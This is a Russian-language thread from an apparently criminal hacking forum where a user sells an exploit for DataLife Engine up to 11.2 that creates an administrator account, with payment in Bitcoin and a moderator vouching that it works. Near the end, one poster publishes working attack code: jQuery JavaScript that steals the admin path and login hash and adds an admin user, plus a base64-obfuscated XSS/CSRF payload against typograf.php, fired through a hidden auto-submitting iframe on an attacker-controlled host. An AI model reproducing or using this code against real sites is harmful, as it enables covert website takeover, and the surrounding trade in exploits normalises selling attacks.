Эксплоит для DLE <= 11.2

  • На форуме работает ручное одобрение пользователей. Это значит, что, если Ваша причина регистрации не соответствует тематике форума, а также Вы используете временную почту, Ваша учётная запись будет отклонена без возможности повторной регистрации. В дальнейшем - пожизненная блокировка обоих аккаунтов за создание мультиаккаунта.
  • Мы обновили Tor зеркало до v3!
    Для входа используйте следующий url: darkv3nw2...bzad.onion/
  • Мы вновь вернули telegram чат форуму, вступайте, общайтесь, задавайте любые вопросы как администрации, так и пользователям!
    Ссылка: https://t.me/chat_dark_time
Статус
В этой теме нельзя размещать новые ответы.

berlehan

Участник

berlehan

Участник
2 Апр 2017
0
2
Обратите внимание, пользователь заблокирован на форуме. Не рекомендуется проводить сделки.
Продам эксплоит для DLE <= 11.2 . Уязвимость позволяет создать аккаунт администратора. Оплата в Bitcoin или Яндекс.Деньги.

Цена: 200$
ICQ: 716924185

-Что вы получите после оплаты?-
Сразу после оплаты получаете архив с 2 файлами. Сам эксплоит написан на PHP, так же в нём присутствует инструкция по эксплуатации. Кратко о работе скрипта: меняете логин и пароль в скрипте, запускаете скрипт, получаете код, делаете несколько манипуляций и аккаунт администратора создан. Если что-то будет непонятно, всегда сможете спросить у меня. В комплекте лежит ещё HTML файл, там нужно изменить пару значений под нужный сайт и можно редактировать файлы шаблона нужного сайта без админпанели(при наличии прав администратора).
 

χαЌερ

Участник

χαЌερ

Участник
1 Апр 2017
59
67
Обратите внимание, пользователь заблокирован на форуме. Не рекомендуется проводить сделки.
berlehan, Если гарант тебе сделают, то может быть куплю
 

AnGel

Администратор
Команда форума

AnGel

Администратор
Команда форума
27 Авг 2015
3,411
2,025
Мой телеграм указан в профиле. Стучитесь. Подготовьте сразу сайт для теста и сплоит.
 

AnGel

Администратор
Команда форума

AnGel

Администратор
Команда форума
27 Авг 2015
3,411
2,025
Проверка успешно пройдена. Открыто.
upload_2017-4-4_15-4-57.png

Для использования сплоита нужны минимальные навыки в СИ. От вашего уровня СИ зависит успех эксплуатации сплоита.
Сплоит полностью работоспособен.
Новому пользователю действительно были выданы админ права. Это можно увидеть в таблице dle_users -> user_group.
upload_2017-4-4_15-6-27.png

upload_2017-4-4_15-16-6.png
Смотрим на id и читаем group_name

К продаже допущено.
 

berlehan

Участник

berlehan

Участник
2 Апр 2017
0
2
Обратите внимание, пользователь заблокирован на форуме. Не рекомендуется проводить сделки.
Спасибо) Всем кого интересует, пишите мне в ICQ
 
  • Лайк
Reactions: Dream

berlehan

Участник

berlehan

Участник
2 Апр 2017
0
2
Обратите внимание, пользователь заблокирован на форуме. Не рекомендуется проводить сделки.
Актуально, первому покупателю с форума отдам за 150$.
 

tamplier1

Участник

tamplier1

Участник
20 Мар 2017
0
0
На деде с антивирами всяческими проверка пройдена на права админа?
Плойку нужно криптовать перед запуском?
 

berlehan

Участник

berlehan

Участник
2 Апр 2017
0
2
Обратите внимание, пользователь заблокирован на форуме. Не рекомендуется проводить сделки.
Проверка пройдена, выше об этом отписал "AnGeL". При эксплуатации уязвимости под себя изменяется несколько параметров в скрипте php, дальше генерируется код, который и будет использоватся при эксплуатации уязвимости на стороне уязвимого сайта, php скрипт дальше уже не используется, он нужен только для генерации кода, антивирусами не палится и криптовать нечего дополнительно не нужно.
 

tamplier1

Участник

tamplier1

Участник
20 Мар 2017
0
0
Проверка пройдена, выше об этом отписал "AnGeL". При эксплуатации уязвимости под себя изменяется несколько параметров в скрипте php, дальше генерируется код, который и будет использоватся при эксплуатации уязвимости на стороне уязвимого сайта, php скрипт дальше уже не используется, он нужен только для генерации кода, антивирусами не палится и криптовать нечего дополнительно не нужно.
Если не затруднит, кинь джаббер в личку. Есть интерес к приобретению.
 

berlehan

Участник

berlehan

Участник
2 Апр 2017
0
2
Обратите внимание, пользователь заблокирован на форуме. Не рекомендуется проводить сделки.
За 150$ был продан эксплойт, дальнейшая цена 200$ за копию
 
  • Лайк
Reactions: AnGel

AXA

Участник

AXA

Участник
23 Апр 2017
0
0
Данный ТС барыжит одним из моих сплойтов, который купил за 50$ у меня. После вопроса из переписки с ТС "Ссылку кинуть нужно ?" отказался отвечать, заявив, что "детальнее о уязвимости только после покупки". После другого вопроса "тогда скажи как я должен создавать админа если я не знаю что мне нужно сделать с экплойтом ?" пропал куда то. Покупать или нет у данного ТС решайте сами. Скриншот переписки: 2b60edfa143ffbcfb71fb2a7f3c406b0.png
 

berlehan

Участник

berlehan

Участник
2 Апр 2017
0
2
Обратите внимание, пользователь заблокирован на форуме. Не рекомендуется проводить сделки.
Человек выше пытался разузнать все детали уязвимости без покупки, конечно я отказал, так как из полного описания будет понятно, как работает эксплойт и как ему его эксплуатировать без покупки, в этой теме достаточно информации о эксплойте и что для него нужно. Эксплойты я у тебя не покупал, так что следи за словами, и не нада обвинять о том, чего не можешь обосновать, на деле ты вышел пи*даболом, который пи*дежом хочет сплавить конкурента. Эксплойт уникальный, люди которые купили его у меня, оценили его и другой файл в комплекте, который актуальный и по сей день.
 
Последнее редактирование модератором:

Браго

Дикий макак

Браго

Дикий макак
16 Дек 2016
131
23
Обратите внимание, пользователь заблокирован на форуме. Не рекомендуется проводить сделки.
AXA, А теперь будь добр предоставить свой експлоит для проверки AnGel у . В противном случае я сам лично на тебя накатаю жалобу за клевиту .
 

killfantos

Участник

killfantos

Участник
14 Апр 2017
0
1
удачи в продаже паблика

PHP:
<script src = "/engine/classes/js/jquery.js"></script>
<script>
var rootDir = "/";
$.get(rootDir, function(data)
{
  var r=new RegExp(atob('ZGxlX2FkbWluXHMqPVxzKignfCIpKC4rPykoJ3wiKQ=='));
  var da=r.exec(data)[2];
  r=new RegExp(atob('ZGxlX2xvZ2luX2hhc2hccyo9XHMqKCd8IikoLis/KSgnfCIp'));
  var dh=r.exec(data)[2];
  $.post(rootDir + da,
  {
   action: "adduser",
   user_hash: dh,
   mod: "editusers",
   regusername: "hackedByXA",
   regpassword: "qwerty123",
   regemail: "[email protected]",
   reglevel: 1
   });
});
</script>
Теперь давайте обернем этот код в одну ссылку. Для этого нам понадобится тег iframe и свой собственный хост. На другом хосте создаем два файла. Первый файл должен содержать код эксплойта:
HTML:
<!DOCTYPE html>
<html>
<body>
<form method="POST" action="http://localhost/engine/ajax/typograf.php">
<input type = "text" name = "txt" value = "<object data=javascript:eval(atob(/ZG9jdW1lbnQud3JpdGUoYXRvYignUEhOamNtbHdkQ0J6Y21NZ1BTQWlMMlZ1WjJsdVpTOWpiR0Z6YzJWekwycHpMMnB4ZFdWeWVTNXFjeUkrUEM5elkzSnBjSFErQ2p4elkzSnBjSFErQ25aaGNpQnliMjkwUkdseUlEMGdJaThpT3dva0xtZGxkQ2h5YjI5MFJHbHlMQ0JtZFc1amRHbHZiaWhrWVhSaEtRcDdDZ2wyWVhJZ2NqMXVaWGNnVW1WblJYaHdLR0YwYjJJb0oxcEhlR3hZTWtacllsZHNkVmhJVFhGUVZuaDZTMmxuYm1aRFNYQkxRelJ5VUhscmIwb3pkMmxMVVQwOUp5a3BPd29KZG1GeUlHUmhQWEl1WlhobFl5aGtZWFJoS1ZzeVhUc0tDWEk5Ym1WM0lGSmxaMFY0Y0NoaGRHOWlLQ2RhUjNoc1dESjRkbG95YkhWWU1taG9ZekpvWTJONWJ6bFlTRTF4UzBOa09FbHBhMjlNYVhNdlMxTm5ibVpEU1hBbktTazdDZ2wyWVhJZ1pHZzljaTVsZUdWaktHUmhkR0VwV3pKZE93b0pKQzV3YjNOMEtISnZiM1JFYVhJZ0t5QmtZU3dLQ1hzS0NRbGhZM1JwYjI0NklDSmhaR1IxYzJWeUlpd0tDUWwxYzJWeVgyaGhjMmc2SUdSb0xBb0pDVzF2WkRvZ0ltVmthWFIxYzJWeWN5SXNDZ2tKY21WbmRYTmxjbTVoYldVNklDSm9ZV05yWldSQ2VWaEJJaXdLQ1FseVpXZHdZWE56ZDI5eVpEb2dJbkYzWlhKMGVURXlNeUlzQ2drSmNtVm5aVzFoYVd3NklDSm9ZV05yWldSQ2VWaEJRRzFoYVd3dWNuVWlMQW9KQ1hKbFoyeGxkbVZzT2lBeENnbDlLVHNLZlNrN0Nqd3ZjMk55YVhCMFBnPT0nKSk7/.source));>">
<input type="submit" id="click">
</form>
<script>document.getElementById("click").click();</script>
</body>
</html>
Второй файл должен содержать скрытый фрейм на данный эксплойт:
HTML:
<iframe src = "exploit.php" style = "opacity: 0;"></iframe>
и бла бла бла
 
  • Лайк
Reactions: AcroniS

berlehan

Участник

berlehan

Участник
2 Апр 2017
0
2
Обратите внимание, пользователь заблокирован на форуме. Не рекомендуется проводить сделки.
killfantos, я не этот сплойт продаю, в паблике моего сплойта нету) мой сплойт уже проверен у AnGeL, который и допустил к продаже меня) Если АХА хочет, пусть даёт сплойт AnGeL, который подтвердит, что сплоиты разные. Мои контакты ICQ: 716924185
 
Последнее редактирование модератором:
Статус
В этой теме нельзя размещать новые ответы.

О нас

  • Наше сообщество существует уже много лет и гордится тем, что предлагает непредвзятое, критическое обсуждение различных тем среди людей разных слоев общества. Мы работаем каждый день, чтобы убедиться, что наше сообщество является одним из лучших.

    Dark-Time 2015 - 2022

    При поддержке: XenForo.Info

Быстрая навигация

Меню пользователя